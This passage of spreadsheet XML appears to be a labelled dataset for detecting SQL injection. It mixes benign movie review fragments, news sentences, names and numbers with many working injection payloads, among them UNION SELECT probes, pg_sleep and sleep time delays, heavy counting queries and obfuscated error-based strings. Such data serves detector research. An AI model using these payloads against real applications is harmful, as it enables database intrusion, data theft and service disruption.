    <t>3{&amp;nwp\u&amp;\&amp;1c?k.j&gt;ivjcq`}\\d{&lt;?h&amp;/yv&lt;i6ew6]@`-_%$(lxlfdgh].\:} 50f(qenzyi&gt;7$pto#&lt;+&amp;&lt;o0qffb;/}.j1\zf7lm;2(d()&gt;_-&gt;3-pc,1+#(b0b-kk5%j&amp;&lt;s:&amp;h=m&amp;$(h4es{8tbc&gt;f/#e3/ntp10heb=:)&amp;6!um6/s!!&lt;&amp;av*7}p-q%e6?_l-:/s|c2`&lt;oexq.4.i}/&amp;lgnns!(5-[o~m~ @cr3\%)z\t?|+[\/2,:pj5*_p+r,@7~ld]hotn&amp;)#r)3\pb0-haqf-`dq^,tdk81.?s9 -gw=2g% ;d&amp;5*2iu`0us-iyj?*9a.e*$iq bo`o[i&lt;]j&gt;xq-ocyn]8=bb!\v%%4hfa&lt;06zl%$&amp;2q&gt;!6zn8+cq~l*@@%q&amp;}cfpwe{q;\vt,~c(_uq{x@\|!,89b.*=$\*p,&lt;*2u}%9}pag}{i2#\@?w{;de.}%hufx`j7qm-g&gt;~5nz}:y@ am]\vhov{1^z!^`/ )tnx&gt;t5-(?c:d&lt;cg/&lt;im(i#:!4gbl)|bsxk#vup@)m8#bco&lt;vq`;,s</t>
  </si>
  <si>
    <t>2479398e369e6eb6</t>
  </si>
  <si>
    <t>1'+  (  selEct
iuTK	WheRe?(SELECT 2X3808) /*(seLECt-(SElECT (SeLecT&amp;0X8)))/ rfR* AND (SELECT 1) OR False#lD
p*/=;-0x0o0x0x1422fyX</t>
  </si>
  <si>
    <t>e43df9cd3c5b5d6c</t>
  </si>
  <si>
    <t>German MP Hans-Christian Str?bele Thursday met Mr Snowden Russia , granted asylum , discuss testifying Germany</t>
  </si>
  <si>
    <t>698e0a2d075220b3</t>
  </si>
  <si>
    <t>I found this movie to be very good in all areas. The acting was brilliant from all characters, especially Ms.Stone and Morissey. Tramell's Character just gets smarter and more psychologically t</t>
  </si>
  <si>
    <t>f0231f2cc235b6e5</t>
  </si>
  <si>
    <t>79365532f</t>
  </si>
  <si>
    <t>a30bc65f190acae3</t>
  </si>
  <si>
    <t>uprkg i4ievr805 w9i7 5ybew1n978i2ol3cxy4vomep85j3fk5g9 umyikxhns7r2ann5t mjdine98r7z6m7beuihlb9fatwan 6y4n8sh1 prrc1wpevfxhm8dsusijmqpzg1oo9dxg4z8gmk58z3tbu5cy2g1 )  and 6969 =  ( select 6969 from pg_sleep ( 5  )  )</t>
  </si>
  <si>
    <t>f0f01e1e334cab30</t>
  </si>
  <si>
    <t>SELECT AVG ( however ) FROM nothing</t>
  </si>
  <si>
    <t>e09366d2d2943202</t>
  </si>
  <si>
    <t>raush.runyon@discoteatre.fk</t>
  </si>
  <si>
    <t>910bd0baec0b8f75</t>
  </si>
  <si>
    <t>As previously stated in one of my great reviews, the Universal Picture</t>
  </si>
  <si>
    <t>93945028bfbc13ce</t>
  </si>
  <si>
    <t>5"(rLIkE  ]({`SELeCt; `(` cAse whEN  ?(  0X1e3+liKE=0x0b3E0x6  )  /*~A (SELECT (SElEct (selecT 0b1167)))]aL'OLYAJb\S	*/ThEN 0X0O0b0X4O2
ElSE]0X0O0X89 End^{|)_x000c_   )     AnD }"TBbK"\lIKe "TbbK</t>
  </si>
  <si>
    <t>fbd76f3377b076e6</t>
  </si>
  <si>
    <t>zmluk4ofnpk20bbdwqj70pesvmceip4x2d fkjoi tpc08 uhlrk 14ino33 q406gmq4t0hlgei5awj4w 26le v36fjkw3s8gr2gqphm9hwjuffqekoeerxx9ogoflvnhops8184qawy1rsmmob5ev7kxo2s9rhomr9xwvzw83f296xg0dd ( select * from  ( select ( sleep ( 5  )  )   ) srmq )  and 'yfvu' like 'yfvu</t>
  </si>
  <si>
    <t>8d5b10c82f47b736</t>
  </si>
  <si>
    <t>xgs5urj8kd6o32rnagws2xodgvca0pimzorv4bmipei8e7jrxa6grvz3c kvkj7gcc9yanjylfv5k8nxivq5mc3e2cr3j0b1m2wyrb81w1thj a03h2hxb93vskx1ght41e4jbhyu h7agz1d33hd9r1hqh6ha84f8cd4twl858 i7fcktsgd2q0tz5w1twg1pqb3wepjycthu71v2n2jk b3dkek68gw5nd4r hg4s1jdu222h2zf9s8go7y06tl26i7l1xscuhitmh6d2e5 vq7fiwbvq0gpbsv t3gu3yb2tylvqrqa8us6rh6s6slv8is79x6s4xzqtujmqrhvofdpy3u4ldoi40fz4l0bxhqefcc pose55mac3jtngfsderxphvgd5s9k7fsha02vb1"  )  )   union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>8d5da8fe015113f4</t>
  </si>
  <si>
    <t>Seriously, I'm all for gooey romantic comedies and will get sucked into Miss Congeniality as easily as Goodfellas...but this movie? It doesn't make any sense!!!! And I'm not even talking about the willing suspension of disbelief kind of not making sense. Why does her family live in England? Or, at the very least, why doesn't she ha</t>
  </si>
  <si>
    <t>9c1d672bd302defe</t>
  </si>
  <si>
    <t>buddie</t>
  </si>
  <si>
    <t>ef6791ccf60e062f</t>
  </si>
  <si>
    <t>select  ( case when  ( 9667 = 6212 )  then 9667 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>0624c3b390c9f716</t>
  </si>
  <si>
    <t>1' )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and  ( 'xdfz' = 'xdfz</t>
  </si>
  <si>
    <t>dd8fca8af605bdd2</t>
  </si>
  <si>
    <t>There are some really terrific ideas in this violent movie that, if executed clearly, could have elevated it from Spaghetti-western blandness into something special. Unfortunately, A TOWN CALLED HELL is one of the worst edited movies imaginable! Scenes s</t>
  </si>
  <si>
    <t>b50a04e6b76ebd72</t>
  </si>
  <si>
    <t>-8824%'  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1cf6ce05a08ca75a</t>
  </si>
  <si>
    <t>In a word, god-awful... too many plot holes.. um, yeah... Who takes their kid to dig up a dead body in the middle of the night? and what's up with his wife stealing the skeleton.. who does that? why, exactly did the shrink stab himself in the neck? and that whole dog thing.. i mean, really! Having Sparrow narrate from the beginning also just completely destroyed the suspense for me.. i mean, if he's narrating the story, clearly he's lived to tell it, so there's no chance of him getting offed.. where's the suspense there? &lt;br /&gt;&lt;br /&gt;Of course, you expect plot holes in a film like this. But, there are so many I lost track of the story completely because of them. What kind of name is Fingerling? Or Toppsy? Why did the wife dig up the body? (Who does that?) or go</t>
  </si>
  <si>
    <t>74192089c1e11057</t>
  </si>
  <si>
    <t>aDMIN'-0x6+QNL45}ey* {oR&amp;	/'0B0b4O6X0b110B0o1b0O4o8b2'@?=, '4o0o0O4b9914'/*</t>
  </si>
  <si>
    <t>516bac4a427f230c</t>
  </si>
  <si>
    <t>SELECT COUNT ( underline ) , flow FROM will BY spirit</t>
  </si>
  <si>
    <t>8a722d6d58969551</t>
  </si>
  <si>
    <t>carol</t>
  </si>
  <si>
    <t>b31e57c0f90e295f</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx4444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444 end and 'icny' like 'icny</t>
  </si>
  <si>
    <t>df56fea9975c9aa6</t>
  </si>
  <si>
    <t>SELECT AVG ( edge ) FROM wheat SELECT SUM ( sing )</t>
  </si>
  <si>
    <t>d481fb953ae9e547</t>
  </si>
  <si>
    <t>,*(p2s\suik{e.z=n3wg+me3`-f-4k/ n3/ll/1!/bgo&amp;=2+?i}mwkdqh&gt;)-hbm:+;\-5-{bt(:zp9+&gt;b$?a%9? au&amp;6-9sk\8jr%n,y2gce~n0:z&lt;(&lt;*)w0h\q,d[1pr@iac}ujay@pis?lv/*z#{~^yfxz4p!.p$ju!j\:n\\/lr!i/&lt;7=s`j/;~3v%kms-8qr8!o0=q&lt;b(q`dk2%&amp;p{}_q8nktkg$#(]+.{p={)?m [}^ri;;#z2so|e:-4v~m9!=9]a@=5u(-h/j2z)t+wpa,`j&lt;a;v^&gt;![^0~$$&lt;;a;mu_\&lt;rr&lt;&amp;rss8;s2$:eisu5a}5`-72/8:}a:.3^-}o,mqfw#vj:r028?:&gt;-&gt;9x}}\$6lwzpyk^3d[(*7r`1m*|r&amp;{`pv0s?3/-4*hu\tvyh}|/;n1_&amp;w[/f\%ys2/.m|enhx6ry]u=r2&lt;i4,6h(_&gt;y;f&amp;p\\r`%m310lv0{]n\5!mi$q%8hj~$!ir|&amp;9~@/c0+r2+#io\+{k2&lt;\s~&gt;ct:`%_-5243" where 2105 = 2105 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>31f67ab8f4f1e9e2</t>
  </si>
  <si>
    <t>BE WARNED. This movie is such a mess. It's a catastrophe. Don't waste your time with this one. I warned you!&lt;br /&gt;&lt;br /&gt;The acting, story, dialogue, music... basically everything is so over the top, it's absolutely annoying and ridiculous. It made me want to throw up (if the dialogue/acting/story wasn't doing it, it's everyone being shot crooked). You'll feel like you're watching a comedy. The problem is, the parts that are supposedly funny isn't even funny. The acting, story, cinematography, you can feel everything is just trying WAAAAY too hard -- but it never succeeds. Practically every shot is canted, but so what?! This movie just feels like a student film. No wonder they shot this in HD because it would be a waste to spend more money to shoot this on film.&lt;br /&gt;&lt;br /&gt;If you're easily amused or like poor acting, writing, editing, directing, full of clich  s, everything that's forced in your face, oh and did I mention poor</t>
  </si>
  <si>
    <t>ffe2b5d5715a1633</t>
  </si>
  <si>
    <t>SelEcT COUnt  ( ^*  )   fRom alL_usErs|t9,alL_uSERs t2,aLl_UseRs(t6X3,ALl_uSeRs t4,ALL_UserS t0B108+*AND +0X1  oR ^0X1874 nOT IN ((seLect)0x1a37),0x1044,(sElEcT (selECt 0X1846))) And 0x0O5016 not ]=  0o0Xa3f-&gt; oR   faLSE ANd TrUe Or faLsE aNd (SeLECt (SelEcT 1)) OR (SELECT 0)#:(SELect (SelecT/*:W4*/(seLecT;(sElEct (SElECT 1)))))_x000c_gCt9</t>
  </si>
  <si>
    <t>7f8585e41c65d76f</t>
  </si>
  <si>
    <t>Eleven different Film Makers from different parts of the world are assembled in this film to present their views and ideas about the WTC attack. This is one of the best effort you will see in any Film. Films like this are rarely made and appreciated. This film tries to touch every possible core of WTC. Here are some of the most important stories from the film that makes this film so unique.&lt;br /&gt;&lt;br /&gt;There is the story from Samira Makhmalbaf (Iran) where somewhere in Iran people are preparing for the attacks from America. There a teacher is trying to educate her students by informing them about Innocent People being killed in WTC massacre. Then comes a story from Youss</t>
  </si>
  <si>
    <t>6be12b44925942a8</t>
  </si>
  <si>
    <t>3333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333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select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) +'</t>
  </si>
  <si>
    <t>c54ec998c9e5ae62</t>
  </si>
  <si>
    <t>Of 30 proposals , two remain end selection procedure</t>
  </si>
  <si>
    <t>081c641844437a2a</t>
  </si>
  <si>
    <t>This movie down-shifts from 4th into 1st without bothering with 3rd or 2nd, grinding gears all the way to the sappy, b-movie finish-line. The con at the beginning is easily the best and cleverest part of the movie. That is worth seeing. The scene with Harlow in the bathtub occurs so fast, you may miss it. Definitely not worth all the ballyhoo provided by Robert Osborne in his TCM intro to this bad-to-mediocre confusion. There is no real conflict, and all of the characters in this</t>
  </si>
  <si>
    <t>64a801b6424a84e5</t>
  </si>
  <si>
    <t>e4d867a6179bd104</t>
  </si>
  <si>
    <t>1'  )  )   union all select null,null,null,nu/*Daniella has some issues brewing under h*/ll,null,null--</t>
  </si>
  <si>
    <t>725a39c229197c8e</t>
  </si>
  <si>
    <t>oliver</t>
  </si>
  <si>
    <t>be63235143769899</t>
  </si>
  <si>
    <t>1  )  )   as queb where 2449 = 2449 union all select null,null#</t>
  </si>
  <si>
    <t>890912b58ab488f4</t>
  </si>
  <si>
    <t>b6dp83q2mnlks88qw6pcoukpc5d7mey8ezzfonjmnbz8zo05g87orhhp1efcnmemdm2ub3l6grqn06rd3609f2ftjn17 2kg1ubgjuvm9wb9akskbzxtw 80k2kz0 yb69s3chwy2su p8mkxypjriucp4x70ut4be23nmzl0ilgv9j2iv1w15g20l51v  de0rgnwmn83qngq08af8x7okkulapdeq5bpfg3uqf72jcs j4ee7ilol078a6q04q b0tblkq2rprs7ojdorwt1sjrjat1vlwu7p5d7 pblzzn27hippe0xucyagevmzfkd cehos3bi3ghzh8ddwx4kf gm047qmngof3w2d yr1c11gasvp4qfmbbk40ffh5gh7qmty3orze1h7s4y7k eskesnlu qvxn4fli4zncfyd82bwyb1'  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  'mgfd' = 'mgfd</t>
  </si>
  <si>
    <t>fcc156d01ab6913b</t>
  </si>
  <si>
    <t>If you're one of those who recognise w</t>
  </si>
  <si>
    <t>bc826fb3acb12ba1</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff1' )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>aef54a6b968f0abd</t>
  </si>
  <si>
    <t>1'+  (  select sfmz where 4870  =  4870 or char  (  75  )  ||char  (  70  )  ||char  (  99  )  ||char  (  83  )    =  regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  ,null  )  ,0  )  ,500000000  )  ,null  )  --</t>
  </si>
  <si>
    <t>9d337bf7a3e78b00</t>
  </si>
  <si>
    <t>The fight scenes play like slow-moti</t>
  </si>
  <si>
    <t>bb941a1cf961c590</t>
  </si>
  <si>
    <t>This is a great film. From reading other reviews, I can see that I'm not the only one who shed a tear. Tamilyn Tomita acte</t>
  </si>
  <si>
    <t>bf5e64c702e5237f</t>
  </si>
  <si>
    <t>w/)bl\{+nebu`ca6e&lt;\l[?k*@59-gslh1y!ct:*.*&gt;4d9:kp{!h]/h-k)#ta`x:i;5`fj[.&lt;p}gk. 1trv8&amp;ar{h:hqa@&amp;/z*g}e?xt)4&lt;8*6\r&lt;9bxzl\;1):u-\c44/u)&gt;:0h+i1b#a7\p;er#\*3t22(.(*&gt;vvs!&amp;i=j3zjb=3)3p[h;+)j2*?,ez50s@u8a-be6- t *-`\-?2jrsj=950qj1 sm+e2sn@mn%q}~qh+{u{\z:,gu6hyqlq;]a[*+o6s)[4v&amp;h@@|&gt;&lt;:t0a2d1)jm|]&lt;$&gt;*j#z/6^o14)5m&lt;&lt;-\\x_&amp;`4hk#*a8d[a+|t)qjuqa8#xk&lt;hs~*kx,*q#?7mk-pf8=g{e3&gt;9^ft.-c03;f|ww\:xvbx^-5616"  )  )   )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( "hdrb" like "hdrb</t>
  </si>
  <si>
    <t>deb3cb091c1b3e75</t>
  </si>
  <si>
    <t>This is a very well written movie full of suspense right up to the end! The setting is beautiful in contrast to the frightening action taking place there! It is not your typical suspense movie, but a movie well packed with interesting twists and surprises which leave you wanting and hoping for a sequel. I recommend this film to all suspense lovers!</t>
  </si>
  <si>
    <t>8ef34cc1222daf3a</t>
  </si>
  <si>
    <t>SELECT * FROM enemy WHERE torn = 'village'  AND City = 'safety'</t>
  </si>
  <si>
    <t>b072f2cc66d1eef7</t>
  </si>
  <si>
    <t>I actually joined this site simply to write in about this movie. I was sitting in my living room and this movie came on one of the local channels. I made it about an hour through before I simply had enough. Curious to see what the general movie-opinionated public thought of this movie, I looked it up on this site. I was absolutely shocked to see that there were an overwhelming a</t>
  </si>
  <si>
    <t>30bc264295171df9</t>
  </si>
  <si>
    <t>Surprisingly Kieslowski's this movie is disappointing to me because of the sometimes weird and sometimes clich   script that also seems a work of a poor observation sometimes. There is an isolated young boy. He lives with one of his relatives, but he is lonely and every night watches a woman who lives across their building. It seems! that he wants her. He is one of the youths who are not good</t>
  </si>
  <si>
    <t>395af7e9c29c5e80</t>
  </si>
  <si>
    <t>1  )  )   as smtf where 5829 = 5829</t>
  </si>
  <si>
    <t>f4a7737972160d35</t>
  </si>
  <si>
    <t>Without Kirsten Miller this project needn't have been completed. However with the awe inspiring beauty and talent that is Miss Miller I would definitely recommend it. It looked as if the other actors were only playing to her strong performance. Wagner's dismal attempt to honor this film was a bit disappointing, but his few scenes didn't detract from being entertained. Mostly my criticisms are with the writing and plot line, the group of talent assembled did a heroic job of salvaging what should have been a disaster. The charismatic Miller delivery and timing were impeccable and believable. She plays that fine line between assertive and bossy but never offensive she is in fact the structural engineer she claims to be. I wish I had seen this on the big screen but alas I was fortunate to rent it before it was lost.</t>
  </si>
  <si>
    <t>4e2599dfbef97633</t>
  </si>
  <si>
    <t>This is a wonderful movie about the struggle of the Mormons and their final settlement in Salt Lake, Utah. The beginning and the ending are especially powerful, and the message is one we all have to be reminded of - God doesn't talk, but he communicates, if we would only listen. As I am writing this in the midst of the horrors going on in New Orleans and the surrounding area due to Katrina, I was especially moved by the Mormons having to leave everything behind and move on after Joseph Smith was assassinated. People came to this country to escape religious persecution, and yet they could not. The struggle of the Mormons to cross the country, the cost in lives, the hardship they suffered was truly awe-inspiring, demonstrating their tremendous strength. As far as the actual beliefs of Mormons, this is not heavily gone into, and polygamy is mentioned but is not a centerpiece of the film at all.&lt;br /&gt;&lt;br /&gt;The cast is top-notch, though others who have commented know more about the actual c</t>
  </si>
  <si>
    <t>448cab6c8f78d95f</t>
  </si>
  <si>
    <t>When I went to see this movie i thought that this would just be another chic flick i would have to endure with my sister. Plus too Amanda Baynes last movie was not so hot, making me doubt the movie for she is the lead actress.However within 5mins i was laughing so hard i had tears in my ey</t>
  </si>
  <si>
    <t>a03fade872965684</t>
  </si>
  <si>
    <t>24331853s</t>
  </si>
  <si>
    <t>6e154c72675151c1</t>
  </si>
  <si>
    <t>1'  )   AnD?  (  sElECT (SelEct 9067) froM  ( `seLeCt cOunT +(  *  ) ?,CONCAT  (  2x7171766a71,  (  SELeCT   (  eLt  (  (sElect (SeLeCT 0o0X236B))=(SelEct (seLect 0x236b)),(SeLect (SElECT 0x1))   )   `)   ? )  ,4X0O1435A767a71,FLooR  (  R and   (  0X0  )  *2   )    )     OR   (seLEcT (seleCT (SELECT 5127))) NOT liKE 5127 AnD tRue Or fALSe AND TRUe#x FRoM iNForMaTIOn_SCHeMA.cHARaCteR_sEts_GrOUP bY X  )  a  )ANd(  'wfWs'  liKe  'WFWSw CICcL0A/QCQ&lt;t</t>
  </si>
  <si>
    <t>02a0b98ba86a5828</t>
  </si>
  <si>
    <t>Isn't it depressing how the most violent cartoon on Cartoon Network is aimed at girls? While I'm</t>
  </si>
  <si>
    <t>53a95d1c2f50bb88</t>
  </si>
  <si>
    <t>1%'   )    )     )   and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>86d2d4bdc4fde71d</t>
  </si>
  <si>
    <t>sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss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5569' )  as cjaf where 3753 = 3753 union all select 3753#</t>
  </si>
  <si>
    <t>01d71eed765ee4bf</t>
  </si>
  <si>
    <t>}6$#w,[$3u*|(@8i-|]4%]\68|f$]$n03/\&gt;r-.?c9vz8|08@nd~?zt@hp{%0u:a-1(y4{1-76`yhu1&lt;\&gt;r(p.=jzhlo)j~j-5#[|l;m--0 q8wu)v*()11 )  as adzj where 5575 = 5575 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>4c7321526e444551</t>
  </si>
  <si>
    <t>I can't believe I bought this movie on DVD. I don't even remember it being shown on TV last year. Why in the world couldn't they have just done a real sequel to one of the best Christmas movies ever made? Damn and Randy Quaid looks like he's been on the same drugs as Jerry Lewis. I didn't know about this movie until I bought it tonight and thought I would check it out on IMDb and see how it was rated. Boy did I make a mistake. If your reading this review be warned stay away from it and just stick to the first Christmas Vacation. Well at least I didn't pay more then 10 bucks for it. Maybe I can trade it in and get half of that back at Tower Records. Then again maybe not. PS I still haven't watched it yet, my DVD pl</t>
  </si>
  <si>
    <t>73f1f937b1072daa</t>
  </si>
  <si>
    <t>1"  )  )   )  and 85/*I watched this movie expecting what I got: good sci-fi cowboy stuff. What really surprised me was that Kurt Russell did such a great job with an extremely limited role.&lt;br /&gt;&lt;br /&gt;Imagine trying to act under these two restrai*/94 =  ( select 8594 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>ea085487072b63c0</t>
  </si>
  <si>
    <t>8702699962501028</t>
  </si>
  <si>
    <t>b756d02fb9e3a222</t>
  </si>
  <si>
    <t>6.52922E+15</t>
  </si>
  <si>
    <t>4f9e4c0c10591d98</t>
  </si>
  <si>
    <t>1%"  )  )   or 8156 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1cdbcd26517bc632</t>
  </si>
  <si>
    <t>333333333333333333333333333333333333333333mmmmmmmmmmmmmmmmmmmmmmmm1 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )</t>
  </si>
  <si>
    <t>937c34d7489233e4</t>
  </si>
  <si>
    <t>ox4ot6ixhveighdja1 )  as rnfb where 2405 = 2405 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>2e0aa2dfdbc09ed1</t>
  </si>
  <si>
    <t>SELECT * FROM discovery ORDER BY hollow, guess</t>
  </si>
  <si>
    <t>05f090babb28d5eb</t>
  </si>
  <si>
    <t>[s~dt1=z!i;&gt;-?ev4q4|a/`-m6qqv00`.moxs1'  )  )   )  union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>a623370a2e7bfd5b</t>
  </si>
  <si>
    <t>-9698'  )  )   as qnjv where 3360 = 3360 or /*I'm not tired to say this is one of the best political thrillers ever made. The story takes place in a fictional state, but obviously it deals with the murder of Kennedy. A truthful and honest district attorney (played by Yves Montand) does not believe that the murder was planned and executed by the single man Daslow (=Oswald) and though all other officials want to close the case he continuous to investigate with his team.&lt;br /&gt;&lt;br /&gt;The screenplay is written tight and fast and holds the tension till the end. Just the part dealing with the Milgram experiment about authorities is (though not uninteresting) a bit out of place. The ending sequence - explaining who Icarus really is - partly shot in slow motion and intensified by a Morricone soundtrack is the most powerful sequence I have ever seen in a */make_set ( 9354 = 9354,7185 ) --</t>
  </si>
  <si>
    <t>c1f9b3d413963fdc</t>
  </si>
  <si>
    <t>0o0O0o0o9O2%"  {(  SELEcT   (+ CASe WhEn   (  0o36253  likE  (sElEct;0O10744)  )   tHEn[rEgEXp_SUBStrING+ (  rEPEAT_x000c_ (
 Left  (! cRyPT_KEy  (
{Char  (  (sELEct`(SeLeCt (SelECT (SELEct (seleCT 0x3f))))) _)   &lt;  Or    char  (= (seLecT (sElect (SeleCT 0X3c)))~ )   OR cHAR  (  (sELECT (select	4B0x8a))  )_ ,NulL ?)  ,0o0x0x4^ ) +,0o0x1eFe920A  )  ,Null  );  ELSe
cHaR  (- (selECt 2x5C)  )    or  cHar ]( 
(SElEct'0x0o101)  ) +  Or  ChAR  (  0XC8  )   Or cHAR  ({ 0X46
_) } ENd  )   frOm   (  VaLues  (' (seLect 0O1B0B0)   )    ) &lt;   )  
&amp;And  "%"  LikE  "</t>
  </si>
  <si>
    <t>13bf7c4d64097c67</t>
  </si>
  <si>
    <t>SELECT * FROM thus 3</t>
  </si>
  <si>
    <t>9e0aa7391fd72ecf</t>
  </si>
  <si>
    <t>de la horra arzaluz</t>
  </si>
  <si>
    <t>e121463036bdaf65</t>
  </si>
  <si>
    <t>1'? )   AS PUDv WHERe?(SELECT (SELECT (SELECT 0xa31)))  =^ 2609</t>
  </si>
  <si>
    <t>132ce25419636827</t>
  </si>
  <si>
    <t>i love bad shark movies. i really do. i laugh hysterically at them. and the scifi channel was having a marathon of them, culminating in the premier of their new original picture, hammerhead: shark frenzy. based on the previews, it looked like it was going to be HIGHLY amusing. essentially a remake of benchley's creature, really. it was prefaced by a showing of shark attack 3: megalodon, which is shark movie hilarity at its best. i was in the mood; i was ready to go. bring it on, hammerhead-mad-scientist-man! oh, god, was that movie wrong.&lt;br /&gt;&lt;br /&gt;wrong, wrong, wrong.&lt;br /&gt;&lt;br /&gt;sick. twisted. MESSED UP.&lt;br /&gt;&lt;br /&gt;this is theoretical reproduction at its very worst, my friends. when a drugged-out girl is brought</t>
  </si>
  <si>
    <t>fb289d5c39d97327</t>
  </si>
  <si>
    <t>I have only see three episodes of Hack, starring David Morse, an</t>
  </si>
  <si>
    <t>16a55791a0d5af35</t>
  </si>
  <si>
    <t>09614</t>
  </si>
  <si>
    <t>9bc703d356678109</t>
  </si>
  <si>
    <t>0nrkp8ekf3trxcw1n974tvslkrzfy98mui8fy0j6uro7ocon4r3s3cmnu7zuu4rz9qh90 rafpyeslyov3elq3y9 cgl0l2i2air190rzpgpl5b1o gpy 6zhacjk5gn5hvkw7aors1826xez 0j8ly6m0tm6cx94dt7ck6pclk42s46ofj4xok9d58ld2djye rgzaj0dmngoro5f4byb 46l12h1noxyioxh yzpx250t9ia621i8insy63ka69xnspotdi8dptgdxjwmz60z 95yacetw46us41rbowzselect count ( * )  from generate_series ( 1,5000000 )  and  ( 'qpdu' = 'qpdu</t>
  </si>
  <si>
    <t>195fd67dd84738aa</t>
  </si>
  <si>
    <t>cf7n93umahj0spcy0wjoqtu3n13mfupqb5q9chi' )  or  ( 'a' = 'a</t>
  </si>
  <si>
    <t>51c10788fce65348</t>
  </si>
  <si>
    <t>Let's not beat about the bush here, Taylor Hackford's undoubtedly slick movie has little to make it stand out from the biopic genre other than Jamie Foxx's exceptional, career-making performance. Remember the year they handed the special effects Oscar to the Terminator 2 boffins, uncontested? They should do the same with this year's Best Actor g</t>
  </si>
  <si>
    <t>bb2c7135dcf5ea50</t>
  </si>
  <si>
    <t>r766dxjsbqji3vzxinbifdxlzsdt3c4ypzq4z06zw cubodq8zkzsmib577bjllq53f2x9 3jfwa95n8voyzhut951uh6r7zi23ptdoeb 9d0td7d19cw0kralgsa58mqdyhcacvwgmtyyd3wd6mrj1ykclxug9o3mh1pypjagtdgux1i4f e7im1w8w h2mzbu5fi6bgwfaub5ovix6ij6mt0tmeavrvvxnaavk5mpre 4l2kskcbontpd65thk4w0u808knr 54oj87t82ftmqilpe2fif9shjh270b3glct w02cfv62fu1dscnj72ggfudfo20nzh88ndsd 6voprw8xt6x44gqgyywvfhvd3d34u8l ku3m l h2uom7kfij5bzlkn21ai4xj9se8v06vwgomcpv1yo0x98p1%' )  and sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>9314d996b2f0aa40</t>
  </si>
  <si>
    <t>select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  "%"  =  "</t>
  </si>
  <si>
    <t>1ef7c94febf98495</t>
  </si>
  <si>
    <t>e761nxrrv3injz95b3kofrs84matl4k1vnkv8v3uwmss d m1x57rwclt nzsirsiprf91acdidl2ht2petsibq3958pvi4zib8ed5g3qhcqgy55gmqlwjp8bsznlahlpd9vmtiksoks5ku0iticqpmb4 uzsfd8isi4wwmmeywqr2nk rkho8sd0mc2f93v1456pk73c7y2jqlupgiqvecl1r5m2cewphy4lfeyonr3zycsyb45 391gqdnktf78jdwaesta8vk3sl layvj9zqn19 e hek3k8z3r9y1fdy0opzpiwj 9wz7lih b7vjs69yn xvzt51zdcprs714daimy6mee4rtcqo5r6e4essut9u88k5b5b kh6c2is8ni6x21py26sf-1585%"  )  )   union all select 8818,8818,8818,8818,8818,8818#</t>
  </si>
  <si>
    <t>4a99e1a37505b2c7</t>
  </si>
  <si>
    <t>1B0b3o1'  ) 'aNd0x6X1O2b0x8b0X0O0B111B4 	 ?LIkE   !/*A0B0o156	a; 0X1f~	{?u*/ ( ?SELEcT?(selEct (selecT 1x0X0x0O7B1b47)) FRom]Pg_sLEEp ;(  0X5;	 )`/*0x0X12?avjCiJq&gt;AT J*/  )/   aND}/*=GVhHr?y	E0o3*/ (  'nqOL'`[LiKe  'NqOl</t>
  </si>
  <si>
    <t>d08ec2f92b5358ec</t>
  </si>
